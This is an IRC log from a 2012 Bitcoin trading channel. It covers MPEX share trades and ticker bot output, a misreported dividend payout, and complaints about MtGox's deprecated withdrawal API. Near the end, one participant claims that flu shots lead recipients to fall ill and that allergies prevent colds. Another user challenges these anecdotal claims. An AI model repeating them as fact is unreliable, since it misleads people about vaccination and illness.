13.64990, 24 hour vwap: 13.44342 Dec 29 00:26:24 ;;ticker Dec 29 00:26:25 BTCUSD ticker | Best bid: 13.45112, Best ask: 13.53299, Bid-ask spread: 0.08187, Last trade: 13.53300, 24 hour volume: 23778.70373198, 24 hour low: 13.33001, 24 hour high: 13.64990, 24 hour vwap: 13.44439 Dec 29 00:28:11 boom ? Dec 29 00:28:31 check the high Dec 29 00:28:43 no... Dec 29 00:28:55 that's been the high for a little while now Dec 29 00:29:07 boom? Dec 29 00:29:54 http://www.youtube.com/watch?v=kZzBd41NuZw Dec 29 00:32:58 the previous high was a misprint Dec 29 00:33:17 it hasn't been about 13.50 for real for a while... Dec 29 00:34:16 [MPEX] [S.MPOE] 15625 @ 0.00064 = 10 BTC [+] Dec 29 00:38:36 [MPEX] [S.MPOE] 9600 @ 0.00064 = 6.144 BTC [+] Dec 29 00:41:21 [MPEX] [S.MPOE] 4500 @ 0.00064 = 2.88 BTC [+] Dec 29 00:48:20 ;;ticker Dec 29 00:48:20 BTCUSD ticker | Best bid: 13.44996, Best ask: 13.49987, Bid-ask spread: 0.04991, Last trade: 13.49996, 24 hour volume: 23899.71614026, 24 hour low: 13.34201, 24 hour high: 13.64990, 24 hour vwap: 13.44574 Dec 29 00:50:45 feeling in the room is palpable Dec 29 00:51:27 ;;bc,24hprc Dec 29 00:51:30 13.37 Dec 29 00:52:18 mircea_popescu: you should let the mpbor % leak ;) Dec 29 00:52:24 lol Dec 29 00:52:31 i dun even have it yet. Dec 29 00:52:44 that doesn't stop most leaks, right? Dec 29 00:53:00 ok. Dec 29 00:53:02 eleventy % Dec 29 00:53:07 lol Dec 29 00:54:34 [MPEX] [S.MPOE] 4900 @ 0.00064 = 3.136 BTC [+] Dec 29 00:59:46 11% lol Dec 29 00:59:47 ;;bc,24hprc Dec 29 00:59:49 13.37 Dec 29 00:59:54 i need a wife Dec 29 01:00:03 mircea_popescu: talk me out of it Dec 29 01:00:28 thestringpuller: that's 111%, actually, didn't you ever read Bilbo's speach at his birthday at the beginning of the hobbit? Dec 29 01:00:33 er Dec 29 01:00:35 110% Dec 29 01:01:18 paraphrased: "i hate all of you goodbye" Dec 29 01:01:18 it was his eleventy-first birthday party Dec 29 01:01:39 lol, that + tact Dec 29 01:13:13 [MPEX] [S.MPOE] 4600 @ 0.00064 = 2.944 BTC [+] Dec 29 01:19:51 [MPEX] [S.MPOE] 1900 @ 0.00064 = 1.216 BTC [+] Dec 29 01:23:09 [MPEX] [S.MPOE] 10215 @ 0.00064 = 6.5376 BTC [+] Dec 29 01:27:48 #bitcoin-assets before mpoe announcement: http://c.cslacker.com/587l.jpg Dec 29 01:28:31 i'm the one on the far right Dec 29 01:29:21 meow Dec 29 01:30:53 smickles: are all the SS payments done now? Dec 29 01:31:11 squeeze him Azelphur Dec 29 01:31:18 Azelphur: nope, and there's one in the pipe right now Dec 29 01:31:24 cool :P Dec 29 01:31:31 i'm working on syncing the chain on that machine Dec 29 01:31:37 :D Dec 29 01:31:40 mmmmm fresh lemonade Dec 29 01:35:40 lol Dec 29 01:38:16 Diablo-D3: you there? Dec 29 01:38:59 afk mining on GTX 630's like a boss Dec 29 01:40:31 [MPEX] [S.MPOE] 4000 @ 0.00064 = 2.56 BTC [+] Dec 29 01:47:09 [MPEX] [S.MPOE] 10450 @ 0.00064 = 6.688 BTC [+] Dec 29 02:00:19 ;;bc,24hprc Dec 29 02:00:20 13.37 Dec 29 02:01:07 ahahah Dec 29 02:01:15 leet btc is leet Dec 29 02:13:26 Completed txs: 670 | Completed txs vol: 5093 BTC Dec 29 02:13:49 broke a pittyful 5k tonight Dec 29 02:18:02 coinbr? Dec 29 02:18:42 http://trilema.com/2012/mpoe-december-2012-statement/ Dec 29 02:18:46 and it's out. good month. Dec 29 02:19:06 I KNEW IT Dec 29 02:19:12 the bond rate sure helpd Dec 29 02:19:43 [MPEX] [S.MPOE] 6250 @ 0.00064 = 4 BTC [+] Dec 29 02:20:16 even if it were 10% it'd still yhave made profit. Dec 29 02:21:16 [MPEX] [S.MPOE] 145000 @ 0.00064 = 92.8 BTC [+] Dec 29 02:21:36 ha Dec 29 02:21:42 getting in before the divvy Dec 29 02:22:29 [MPEX] [S.MPOE] 21000 @ 0.00064 = 13.44 BTC [+] Dec 29 02:22:33 lol Dec 29 02:22:47 those aren't the bot Dec 29 02:23:10 [MPEX] [S.MPOE] 800000 @ 0.00064 = 512 BTC [+] Dec 29 02:24:21 campbx might have gone bad Dec 29 02:24:31 [MPEX] [S.MPOE] 3650 @ 0.00064 = 2.336 BTC [+] Dec 29 02:24:40 thats the bot Dec 29 02:25:47 [MPEX] [S.MPOE] 50000 @ 0.00064 = 32 BTC [+] Dec 29 02:26:37 [MPEX] [S.MPOE] [PAID] 500000000 @ 0.00000003 = 14 BTC Dec 29 02:26:54 fuck Dec 29 02:26:55 too Dec 29 02:26:57 slow Dec 29 02:28:07 14BTC??? Dec 29 02:28:58 bah i fucked it up Dec 29 02:29:08 freeze everything! Dec 29 02:29:36 thats just assbot Dec 29 02:29:42 assfuckin around. Dec 29 02:29:49 no i actually fucked it up Dec 29 02:29:53 sent 10x Dec 29 02:30:58 no Dec 29 02:31:11 too late I spent it Dec 29 02:33:10 heh Dec 29 02:33:11 lol Dec 29 02:33:14 everything is frozen Dec 29 02:33:19 my S.DICE buy is not executing Dec 29 02:33:28 twitter says S.MPOE paid a total dividend of 14`252.99177745 BTC to 500`000`000 outstanding shares. Dec 29 02:33:35 quite a hefty sum Dec 29 02:33:44 well Dec 29 02:33:53 13000 of it was to MP Dec 29 02:34:18 and assbot needs fixing to parse romanian numerals Dec 29 02:34:25 at least now we know mp has 14000 BTC Dec 29 02:34:41 mpex needs to upgrade teh api interface Dec 29 02:37:01 damn, my mpbor troll didn't work :P Dec 29 02:37:25 maybe it did, and I spooked money into sensible bids, who knows Dec 29 02:37:44 yowza! Dec 29 02:38:01 there wasn't much volatility this month, so maybe that ment not a lot of exposure Dec 29 02:38:39 so mad I didn't get my other 280BTC into S.MPOE before the fuckup Dec 29 02:39:20 well yes everything is frozen Dec 29 02:39:30 Total capital : 7`292.03, of which Dec 29 02:40:33 [MPEX] [S.DICE] 2050 @ 0.00346166 = 7.0964 BTC [-] Dec 29 02:40:35 [MPEX] [S.DICE] 126 @ 0.00355333 = 0.4477 BTC [+] Dec 29 02:40:36 [MPEX] [S.DICE] 1370 @ 0.00358687 = 4.914 BTC [+] Dec 29 02:40:37 [MPEX] [S.DICE] 477 @ 0.00358998 = 1.7124 BTC [+] Dec 29 02:40:38 [MPEX] [S.DICE] 650 @ 0.00359072 = 2.334 BTC [+] Dec 29 02:40:40 [MPEX] [S.DICE] 12499 @ 0.0036 = 44.9964 BTC [+] Dec 29 02:41:02 there we go Dec 29 02:41:40 [MPEX] [S.MPOE] [PAID] 500000000 @ = 1 BTC Dec 29 02:41:54 much better, a coin. Dec 29 02:42:11 haha okai, Dec 29 02:42:13 fuckin broked shit Dec 29 02:42:23 5000infinities @ nothinghere = 1! Dec 29 02:42:27 yes Dec 29 02:42:31 didnt ya know Dec 29 02:43:07 hipstermath Dec 29 02:43:17 single precision Dec 29 02:43:38 perhaps "1" was indeed "true" Dec 29 02:43:57 as in "yes it paid btc" Dec 29 02:44:08 hey, at least assbot doesn't go around paying 15k btc instead 0f 1.5k Dec 29 02:44:21 :D Dec 29 02:44:22 o hai jurov Dec 29 02:45:09 [MPEX] [S.MPOE] 5396 @ 0.00063988 = 3.4528 BTC [-] Dec 29 02:47:07 in other news Dec 29 02:47:09 ;;ticker Dec 29 02:47:09 BTCUSD ticker | Best bid: 13.42198, Best ask: 13.49631, Bid-ask spread: 0.07433, Last trade: 13.42187, 24 hour volume: 23987.69053134, 24 hour low: 13.34201, 24 hour high: 13.64990, 24 hour vwap: 13.44801 Dec 29 02:47:14 ;;ticker Dec 29 02:47:15 BTCUSD ticker | Best bid: 13.42198, Best ask: 13.49631, Bid-ask spread: 0.07433, Last trade: 13.42187, 24 hour volume: 23987.69053134, 24 hour low: 13.34201, 24 hour high: 13.64990, 24 hour vwap: 13.44801 Dec 29 02:47:30 ;;ticker Dec 29 02:47:30 BTCUSD ticker | Best bid: 13.42198, Best ask: 13.49631, Bid-ask spread: 0.07433, Last trade: 13.42187, 24 hour volume: 23987.69053134, 24 hour low: 13.34201, 24 hour high: 13.64990, 24 hour vwap: 13.44801 Dec 29 02:47:38 13.60 Dec 29 02:48:01 13.65 Dec 29 02:48:15 done. fortunately that i don't trust stat stuff and initiate dividing the cake manually. Dec 29 02:48:18 ;;ticker Dec 29 02:48:19 BTCUSD ticker | Best bid: 13.42198, Best ask: 13.55000, Bid-ask spread: 0.12802, Last trade: 13.65000, 24 hour volume: 31339.88226787, 24 hour low: 13.34201, 24 hour high: 13.66978, 24 hour vwap: 13.48579 Dec 29 02:48:27 13:67 Dec 29 02:49:31 here we go again Dec 29 02:50:32 13:67 huh ? Dec 29 02:53:03 13.67 Dec 29 02:53:05 $ Dec 29 02:53:06 [MPEX] [S.MPOE] 4050 @ 0.00063988 = 2.5915 BTC [-] Dec 29 02:53:49 does split use 24hprc for ITM put deposit calculations? Dec 29 02:54:04 plus some volatility sauce. Dec 29 03:04:55 [MPEX] [S.MPOE] 4900 @ 0.00063988 = 3.1354 BTC [-] Dec 29 03:14:55 [MPEX] [S.MPOE] 8482 @ 0.00063988 = 5.4275 BTC [-] Dec 29 03:15:01 [MPEX] [S.MPOE] 4800 @ 0.0006396 = 3.0701 BTC [-] Dec 29 03:15:03 [MPEX] [S.MPOE] 8944 @ 0.00063934 = 5.7183 BTC [-] Dec 29 03:15:04 [MPEX] [S.MPOE] 6948 @ 0.00063915 = 4.4408 BTC [-] Dec 29 03:15:05 [MPEX] [S.MPOE] 9400 @ 0.00063909 = 6.0074 BTC [-] Dec 29 03:15:06 [MPEX] [S.MPOE] 6300 @ 0.00063896 = 4.0254 BTC [-] Dec 29 03:15:07 [MPEX] [S.MPOE] 3260 @ 0.0006388 = 2.0825 BTC [-] Dec 29 03:15:08 [MPEX] [S.MPOE] 10900 @ 0.00063877 = 6.9626 BTC [-] Dec 29 03:15:10 [MPEX] [S.MPOE] 12627 @ 0.00063873 = 8.0652 BTC [-] Dec 29 03:15:10 [MPEX] [S.MPOE] 12400 @ 0.00063833 = 7.9153 BTC [-] Dec 29 03:15:11 [MPEX] [S.MPOE] 6500 @ 0.00063831 = 4.149 BTC [-] Dec 29 03:15:12 [MPEX] [S.MPOE] 2500 @ 0.00063802 = 1.5951 BTC [-] Dec 29 03:16:04 [MPEX] [S.MPOE] 65000 @ 0.000638 = 41.47 BTC [-] Dec 29 03:17:40 lol Dec 29 03:18:10 [MPEX] [S.MPOE] 3000 @ 0.000638 = 1.914 BTC [-] Dec 29 03:30:34 [MPEX] [S.MPOE] 7250 @ 0.000638 = 4.6255 BTC [-] Dec 29 03:31:26 [MPEX] [S.MPOE] 10215 @ 0.000638 = 6.5172 BTC [-] Dec 29 03:44:34 eee the scalping Dec 29 03:56:55 that 'volatility sauce' is annoying as fuck :P Dec 29 03:58:47 i live to piss off. Dec 29 04:07:28 [MPEX] [S.MPOE] 5700 @ 0.000638 = 3.6366 BTC [-] Dec 29 04:26:17 boring Dec 29 04:34:20 [MPEX] [S.MPOE] 7183 @ 0.000638 = 4.5828 BTC [-] Dec 29 04:53:35 ;;ticker Dec 29 04:53:35 BTCUSD ticker | Best bid: 13.52109, Best ask: 13.59974, Bid-ask spread: 0.07865, Last trade: 13.52109, 24 hour volume: 32543.24138401, 24 hour low: 13.34201, 24 hour high: 13.67000, 24 hour vwap: 13.49578 Dec 29 04:54:36 "bitcoin moves up on good mpex news" Dec 29 04:56:24 lol Dec 29 04:56:31 sure seemed like it Dec 29 05:00:26 [MPEX] [S.MPOE] 5400 @ 0.000638 = 3.4452 BTC [-] Dec 29 05:07:24 [MPEX] [S.MPOE] 12300 @ 0.000638 = 7.8474 BTC [-] Dec 29 05:11:06 [MPEX] [S.MPOE] 500 @ 0.000638 = 0.319 BTC [-] Dec 29 05:12:32 Ukto: yes Im here Dec 29 05:12:34 in other news Dec 29 05:12:37 https://www.techdirt.com/blog/wireless/articles/20121228/01025121504/sf-wireless-isp-monkeybrains-tries-to-crowdfund-325-million-satellite.shtml Dec 29 05:12:45 :3 Dec 29 05:13:09 Ukto: btw, nefario just sent me my final list Dec 29 05:19:22 are you consulting for them Diablo-D3 ? Dec 29 05:20:32 mircea_popescu: please say you have a good punchline for that Dec 29 05:20:50 that was the punchline omg Dec 29 05:20:55 lol Dec 29 05:21:27 you dun think it's funny ? Dec 29 05:23:16 nope Dec 29 05:25:43 [MPEX] [S.MPOE] 23198 @ 0.000638 = 14.8003 BTC [-] Dec 29 05:58:13 alright, live test month of SOEBOT has begun! Dec 29 06:00:11 [MPEX] [S.MPOE] 27000 @ 0.000638 = 17.226 BTC [-] Dec 29 06:01:04 wat? Dec 29 06:01:36 I've launched an options market maker bot in beta Dec 29 06:01:56 go trade with it :) Dec 29 06:05:04 how much capital is behind the bo Dec 29 06:05:05 bot Dec 29 06:05:06 ;;ticker Dec 29 06:05:07 BTCUSD ticker | Best bid: 13.43475, Best ask: 13.49409, Bid-ask spread: 0.05934, Last trade: 13.49409, 24 hour volume: 34545.30775319, 24 hour low: 13.30000, 24 hour high: 13.67000, 24 hour vwap: 13.48996 Dec 29 06:05:34 [MPEX] [S.MPOE] 13050 @ 0.000638 = 8.3259 BTC [-] Dec 29 06:05:44 oh snap Dec 29 06:07:21 [MPEX] [S.MPOE] 6500 @ 0.000638 = 4.147 BTC [-] Dec 29 06:09:16 thestringpuller: a bit over 100 btc for now Dec 29 06:16:51 soebot ?! Dec 29 06:17:35 smickles is it trading 1 option ? Dec 29 06:18:12 heh, yeah, one on each side of each strike which it's targeting Dec 29 06:19:16 cute :D Dec 29 06:19:31 anyway, this is enough excitement for one day. Dec 29 06:19:35 catch you all... next year ? Dec 29 06:19:41 i'm fine with making 1/1000th of mpoebot's profit :) Dec 29 06:20:27 im kinda impressed with mpoebot tbh Dec 29 06:20:33 how many trade bots get to be over one year old ? Dec 29 06:21:31 a lot **** BEGIN LOGGING AT Sat Dec 29 13:01:55 2012 Dec 29 13:12:32 [MPEX] [S.MPOE] 8850 @ 0.000638 = 5.6463 BTC [-] Dec 29 13:24:40 [MPEX] [S.MPOE] 4216 @ 0.000638 = 2.6898 BTC [-] Dec 29 13:27:26 [MPEX] [S.MPOE] 8300 @ 0.000638 = 5.2954 BTC [-] Dec 29 13:40:30 [MPEX] [S.MPOE] 5892 @ 0.000638 = 3.7591 BTC [-] Dec 29 13:43:41 [MPEX] [S.MPOE] 3700 @ 0.000638 = 2.3606 BTC [-] Dec 29 13:46:13 [MPEX] [S.MPOE] 11650 @ 0.000638 = 7.4327 BTC [-] Dec 29 14:09:18 [MPEX] [S.MPOE] 9800 @ 0.000638 = 6.2524 BTC [-] Dec 29 14:09:56 [MPEX] [S.MPOE] 1950 @ 0.000638 = 1.2441 BTC [-] Dec 29 14:14:11 fuckyea. Dec 29 14:15:25 http://www.cs.huji.ac.il/~avivz/publications.html Dec 29 14:20:27 https://fbcdn-sphotos-b-a.akamaihd.net/hphotos-ak-ash3/541031_473590599354599_248671373_n.jpg Dec 29 14:30:35 who;s he ? Dec 29 14:33:09 says on the homepage Dec 29 14:33:45 ok but i mean... Dec 29 14:33:53 [MPEX] [S.DICE] 502 @ 0.00346013 = 1.737 BTC [-] Dec 29 14:35:09 dunno Dec 29 14:35:15 im talkin to one of his students or smth Dec 29 14:41:20 [MPEX] [S.MPOE] 7300 @ 0.000638 = 4.6574 BTC [-] Dec 29 14:53:10 a ok Dec 29 15:19:14 [MPEX] [S.MPOE] 3166 @ 0.000638 = 2.0199 BTC [-] Dec 29 15:44:22 [MPEX] [S.MPOE] 3200 @ 0.000638 = 2.0416 BTC [-] Dec 29 15:52:03 [MPEX] [S.MPOE] 20900 @ 0.000638 = 13.3342 BTC [-] Dec 29 16:03:30 [MPEX] [S.MPOE] 6100 @ 0.000638 = 3.8918 BTC [-] Dec 29 16:32:16 [MPEX] [S.MPOE] 2250 @ 0.000638 = 1.4355 BTC [-] Dec 29 16:34:19 [MPEX] [S.MPOE] 7450 @ 0.000638 = 4.7531 BTC [-] Dec 29 16:37:35 [MPEX] [S.MPOE] 12501 @ 0.000638 = 7.9756 BTC [-] Dec 29 16:44:20 638 is even more boring than 64 Dec 29 16:53:05 [MPEX] [S.MPOE] 3100 @ 0.000638 = 1.9778 BTC [-] Dec 29 16:54:12 [MPEX] [S.MPOE] 1800 @ 0.000638 = 1.1484 BTC [-] Dec 29 17:03:55 who is the new owner of bitmarket.eu? Dec 29 17:12:04 [MPEX] [S.MPOE] 14000 @ 0.000638 = 8.932 BTC [-] Dec 29 17:20:28 [MPEX] [S.MPOE] 20372 @ 0.000638 = 12.9973 BTC [-] Dec 29 17:34:05 [MPEX] [S.MPOE] 8450 @ 0.000638 = 5.3911 BTC [-] Dec 29 17:42:46 [MPEX] [S.MPOE] 10450 @ 0.000638 = 6.6671 BTC [-] Dec 29 17:52:43 [MPEX] [S.MPOE] 2900 @ 0.000638 = 1.8502 BTC [-] Dec 29 18:02:14 [MPEX] [S.MPOE] 8100 @ 0.000638 = 5.1678 BTC [-] Dec 29 18:11:52 [MPEX] [S.MPOE] 5735 @ 0.000638 = 3.6589 BTC [-] Dec 29 18:34:05 [MPEX] [S.MPOE] 7257 @ 0.000638 = 4.63 BTC [-] Dec 29 19:26:05 [MPEX] [S.MPOE] 2607 @ 0.000638 = 1.6633 BTC [-] Dec 29 19:30:54 anyone here using gox api v1 Dec 29 19:40:42 "A node in the network has an Dec 29 19:40:43 incentive to keep the knowledge of any transaction that offers a fee to itself, Dec 29 19:40:45 A node in the network has an Dec 29 19:40:48 incentive to keep the knowledge of any transaction that offers a fee to itself, Dec 29 19:40:52 "A node in the network has an Dec 29 19:40:52 incentive to keep the knowledge of any transaction that offers a fee to itself, Dec 29 19:40:57 ack Dec 29 19:40:59 whops Dec 29 19:41:05 *oo Dec 29 19:41:16 anyway, good link kakobrekla Dec 29 19:41:39 kakobrekla: also, i use gox's v1 api from time to time Dec 29 19:43:24 smickles https://bitcointalk.org/index.php?topic=133829.0 Dec 29 19:44:29 smickles: pm :) Dec 29 19:44:32 [MPEX] [S.MPOE] 11400 @ 0.000638 = 7.2732 BTC [-] Dec 29 19:50:48 kakobrekla: i'm not sure, but I think they require valid user-agent headers too Dec 29 19:51:20 oh, nvm, that was a silly answer Dec 29 19:52:16 kakobrekla: i only do manual withdrawals, so I don't know how well I can help Dec 29 19:52:34 k Dec 29 19:57:30 kakobrekla: I don't use that api call to gen a key Dec 29 19:57:41 hm? Dec 29 19:58:12 I use the the site to manually fetch a key/secret pair for each app Dec 29 19:59:07 eh? Dec 29 19:59:22 hmm, I suppose only withdrawal requires the HOTP? Dec 29 19:59:51 dunno Dec 29 20:00:02 imma gonna try v2 now Dec 29 20:00:09 lets see what error i get there Dec 29 20:00:14 is there any documentation on v2? Dec 29 20:00:20 at all? anywhere? Dec 29 20:00:20 no Dec 29 20:00:26 but i have a working function Dec 29 20:00:31 cause i have a special call Dec 29 20:00:37 only for me. Dec 29 20:00:39 ;> Dec 29 20:03:22 [MPEX] [S.MPOE] 7527 @ 0.000638 = 4.8022 BTC [-] Dec 29 20:04:03 ugh Dec 29 20:04:07 dont get me started on their api Dec 29 20:04:13 v1.. v2.. wtf. Dec 29 20:04:17 i have to use a half mix between them Dec 29 20:04:18 for weex Dec 29 20:04:31 do you have withdrawals working? Dec 29 20:04:55 i only use them for generating and inputting mtgox codes Dec 29 20:05:10 yeah well Dec 29 20:05:15 if you generate a code Dec 29 20:16:56 [MPEX] [S.MPOE] 13882 @ 0.000638 = 8.8567 BTC [-] Dec 29 20:17:15 ;;seen Ukto Dec 29 20:17:15 Ukto was last seen in #bitcoin-assets 12 minutes and 19 seconds ago: i only use them for generating and inputting mtgox codes Dec 29 20:17:28 ? Dec 29 20:17:37 was waiting for you to finish your comment Dec 29 20:17:37 :P Dec 29 20:17:38 just wanted to see what your last line was Dec 29 20:17:44 oh Dec 29 20:17:44 lol Dec 29 20:17:48 perhaps i was cut off Dec 29 20:17:56 [12:07] if you generate a code Dec 29 20:17:56 [12:11] * kakobrekla (~T42@89-212-41-49.static.t-2.net) Quit (Read error: Connection reset by peer) Dec 29 20:18:05 19:05.07 ( kakobrekla ) if you generate a code Dec 29 20:18:05 19:05.15 ( kakobrekla ) you use withdrawal api Dec 29 20:18:05 19:05.18 ( kakobrekla ) if you use v0 Dec 29 20:18:05 19:05.24 ( kakobrekla ) you need to change Dec 29 20:18:05 19:05.29 ( kakobrekla ) just as i need to. Dec 29 20:18:05 19:06.09 ( kakobrekla ) if you use v1 you need to share how da fuck you gen code with it Dec 29 20:18:06 19:06.16 ( kakobrekla ) ;> Dec 29 20:18:21 i dont know wtf ver I use Dec 29 20:18:25 it was the only one at the time that I know of Dec 29 20:18:30 someone did a withdraw... 2? days ago Dec 29 20:18:42 dec 27th Dec 29 20:18:47 ya v0 is dead by the end of 2012 Dec 29 20:19:08 I may just shut it down and say fuck it Dec 29 20:19:14 ;) Dec 29 20:19:48 ill look in 1 sec and tell you Dec 29 20:19:51 which I am using Dec 29 20:19:55 v0 prolly Dec 29 20:19:58 gotta finish setting up some routing real quick Dec 29 20:19:59 prolly Dec 29 20:20:16 i doubt ANYONE has got v1 working Dec 29 20:20:59 and if im right they better not close it Dec 29 20:20:59 the old one Dec 29 20:21:51 v0 was so simple :/ Dec 29 20:22:19 the hard part was trying ot figure out the docs Dec 29 20:22:19 ya Dec 29 20:22:19 that fact still remains Dec 29 20:30:00 well Dec 29 20:30:04 seeing as the url is 0/ Dec 29 20:30:08 I assume its not v1 Dec 29 20:30:14 correct Dec 29 20:30:33 so we have what.. 2? days? Dec 29 20:30:55 v2 returns simmilar to v1 but has ZERO docs Dec 29 20:30:55 ["error"]=> Dec 29 20:30:56 string(45) "Identification required to access private API" Dec 29 20:30:56 ["token"]=> Dec 29 20:30:56 string(14) "login_required" Dec 29 20:31:05 v1 is missing the OTP part Dec 29 20:31:13 yeah according to their email Dec 29 20:31:19 You are currently making use of a system which will be deprecated on Mon 31 Dec 2012 12:00:00 AM GMT: Dec 29 20:33:00 i didnt get an email Dec 29 20:33:01 heh Dec 29 20:33:24 well i see in my code that btc2code is a 0/withdraw.php call Dec 29 20:33:45 so i guess you fall in that category as well Dec 29 20:33:53 yeah Dec 29 20:34:00 i use mtgox_redeem and mtgox_createcoupon Dec 29 20:34:25 oh wiat, I wrote these functions Dec 29 20:34:26 LOL Dec 29 20:34:31 ya Dec 29 20:34:42 its a 0/withdraw.php post Dec 29 20:34:44 last touched may 30th 2012 Dec 29 20:34:47 to get the code Dec 29 20:35:30 so the email says Dec 29 20:35:30 Old bitcoin withdraw method for withdrawing bitcoins is deprecated. Please use https://mtgox.com/api/1/generic/bitcoin/send_simple or https://mtgox.com/api/2/money/bitcoin/send_simple instead Dec 29 20:35:37 but no docu :> Dec 29 20:35:42 tards. Dec 29 20:36:11 gox was one of the main reasons for why I am spending so much on my API documentation Dec 29 20:36:16 for BF && Weex Dec 29 20:36:24 fully interactive API documentation Dec 29 20:50:51 [MPEX] [S.MPOE] 2800 @ 0.000638 = 1.7864 BTC [-] Dec 29 20:53:47 interactive api documentation? :> Dec 29 20:53:58 cmon Dec 29 20:54:14 thats not the important part here Dec 29 20:54:41 hum Dec 29 20:55:02 blockchain info can do api withdrawals too eh Dec 29 20:57:24 blockchain.info can do a lot of things, apparently Dec 29 20:58:08 but gox is free Dec 29 20:58:17 here one needs to pay a tx fee ;> Dec 29 20:58:38 cake is a lie. Dec 29 21:04:25 [MPEX] [S.MPOE] 7250 @ 0.000638 = 4.6255 BTC [-] Dec 29 21:05:26 blockchain also has issues Dec 29 21:05:28 and no responsibilities Dec 29 21:05:38 i have reported an problem with like 3 json responses Dec 29 21:05:40 issues? Dec 29 21:05:41 repeatedly Dec 29 21:05:47 starting months ago Dec 29 21:05:49 that they didnt fix yet Dec 29 21:05:54 which calls Dec 29 21:05:55 and no response Dec 29 21:06:07 mostly just json blockchain infos Dec 29 21:06:14 i use it too Dec 29 21:06:19 but i havent had any issues Dec 29 21:06:28 ill have todig it up Dec 29 21:06:31 1 sec Dec 29 21:08:29 try http://blockchain.info/rawblock/1551 then incriment it to block 1552 Dec 29 21:08:39 their shit wont give block details above block 1551 Dec 29 21:08:53 which is completely useless Dec 29 21:09:12 because it doesnt work Dec 29 21:09:18 I ended up doing a lot of work Dec 29 21:09:22 to get the same data Dec 29 21:09:36 thats just one of the issues Dec 29 21:09:37 it works again for recent ones Dec 29 21:09:41 win Dec 29 21:10:05 sigh Dec 29 21:10:11 so they just chose to not have data for the middle Dec 29 21:10:39 no idea Dec 29 21:11:00 so it only urns on the last block Dec 29 21:11:07 otherwise it give syou non rawdata Dec 29 21:11:09 206 is there Dec 29 21:11:19 but anythen below the last block doesnt even give you a json error Dec 29 21:11:21 just a bunch of html Dec 29 21:11:40 its retarded as hell Dec 29 21:11:47 there are like 4 other things Dec 29 21:11:52 i can dig up later Dec 29 21:11:57 they just are not consistant enough Dec 29 21:11:59 i use two calls Dec 29 21:12:09 no prob so far Dec 29 21:12:24 that was teh most important one I needed Dec 29 21:12:32 and generally for blocks 2~6 blocks old Dec 29 21:12:36 why did you need that Dec 29 21:12:47 simple way to verify random data :) Dec 29 21:12:58 for projects not yet public Dec 29 21:13:00 :P Dec 29 21:14:57 [MPEX] [S.MPOE] 2961 @ 0.000638 = 1.8891 BTC [-] Dec 29 21:35:52 [MPEX] [S.MPOE] 9200 @ 0.000638 = 5.8696 BTC [-] Dec 29 22:00:14 [MPEX] [S.MPOE] 10900 @ 0.000638 = 6.9542 BTC [-] Dec 29 22:20:08 [MPEX] [S.MPOE] 10800 @ 0.000638 = 6.8904 BTC [-] Dec 29 22:31:17 [MPEX] [S.MPOE] 6403 @ 0.000638 = 4.0851 BTC [-] Dec 29 22:51:08 [MPEX] [S.MPOE] 6178 @ 0.000638 = 3.9416 BTC [-] Dec 29 22:53:08 [MPEX] [S.MPOE] 8759 @ 0.000638 = 5.5882 BTC [-] Dec 29 22:53:49 lol Dec 29 22:54:01 were the dividends not large enough? Dec 29 22:54:57 there was a large-ish buy right before Dec 29 22:55:01 went on sale immediately after Dec 29 23:04:07 [MPEX] [S.MPOE] 5500 @ 0.000638 = 3.509 BTC [-] Dec 29 23:10:21 heh Dec 29 23:10:26 the whale strikes again Dec 29 23:13:40 [MPEX] [S.MPOE] 7000 @ 0.000638 = 4.466 BTC [-] Dec 29 23:20:54 being sick sucks Dec 29 23:21:09 as far as I can tell, everyone who got a flu shot this year eventually gets this Dec 29 23:21:34 its not in the flu shot I dont think, its some combination of whats in the shot and whats out there Dec 29 23:21:53 anyone who didnt get a shot either didnt get this or has full blown flu Dec 29 23:22:47 Can't it be plain cold if it's not full blown flu you have? Dec 29 23:23:00 no, I dont get colds. ever. Dec 29 23:23:11 and flu is basically leathal for me Dec 29 23:23:36 How can you know it's not cold =/ Dec 29 23:24:22 I dont get colds. ever. I thought I said this. Dec 29 23:26:12 That's not a good arguments. You can't claim you're immune to every cold virus. Dec 29 23:27:06 its a tradeoff from having allergies Dec 29 23:30:15 Discuss: web forums are the biggest step back in communications. They are bloated 2MBs of information per page for what should be approx 1-2000 words Dec 29 23:30:33 bring back cosy/tin/trn/cix! Dec 29 23:30:47 and mpex :D Dec 29 23:30:52 markedathome: its not the concept of forums do that Dec 29 23:30:55 *that do that Dec 29 23:30:59 its the shitty forum software Dec 29 23:31:16 How do having allergies prevent cold? O.o Dec 29 23:31:51 ? Dec 29 23:32:52 mircea_popescu: can i do ignore, prioritise, highlight,kill a thread? I don't think so :-) Dec 29 23:33:30 ya well. Dec 29 23:33:50 Diablo-D3: it is absolutely the forum concept. a bunch of fucking idjits came along and completely missed the good things about threading in nntp/cosy/cix/bix/well and "re-implemented" Dec 29 23:33:54 Namjies: it isnt supposed to, its a side effect Dec 29 23:34:38 and implemented all the bad. static pages built at each page request from a database... Dec 29 23:35:53 markedathome: well thats the thing Dec 29 23:36:12 the static page only needs to be about 200 bytes bigger than the content Dec 29 23:36:13 there's no such side-effect of allergies O.o Dec 29 23:36:30 Namjies: trust me, there is Dec 29 23:37:29 You're telling me the fact your immune system reacts to certain substances makes it non-reactive to the cold virus? Dec 29 23:37:31 huh huh, well it uses mysql/progres-sql/db-de-jour, and php! and perl! and python! and ruby! and whatever took the "designer's" fancy that day Dec 29 23:39:36 Namjies: allergies are an overactive immune system Dec 29 23:39:39 i'm surprised that no one had implemented a json decoder in xml for a brainfuck interpreted client running on java for a 3 page forum thread on the use of vinegar for descaling kettles. Dec 29 23:42:29 Diablo-D3 so how does that makes you immune to cold? Dec 29 23:42:44 Namjies: it isnt supposed to Dec 29 23:43:02 it just does for a lot of people who have severe allergies to stuff like trees and flowering plants Dec 29 23:43:42 Is that just an impression of yours or a scientifically recognized fact? Dec 29 23:44:23 neither Dec 29 23:44:34 a lot of allergen sufferers have noticed this Dec 29 23:46:01 It might just be that allergies and cold are hard to distinguish, having similar effects. Dec 29 23:46:53 they're not similar Dec 29 23:47:44 [MPEX] [O.BTCUSD.C120T] 600 @ 0.2922464 = 175.3478 BTC [+] Dec 29 23:47:53 [MPEX] [O.BTCUSD.C130T] 900 @ 0.2479297 = 223.1367 BTC [+] Dec 29 23:48:55 [16:20] being sick sucks Dec 29 23:48:55 [16:21] as far as I can tell, everyone who got a flu shot this year eventually gets this Dec 29 23:48:55 [16:21] its not in the flu shot I dont think, its some combination of whats in the shot and whats out there Dec 29 23:48:58 ... Dec 29 23:48:59 [16:23] and flu is basically leathal 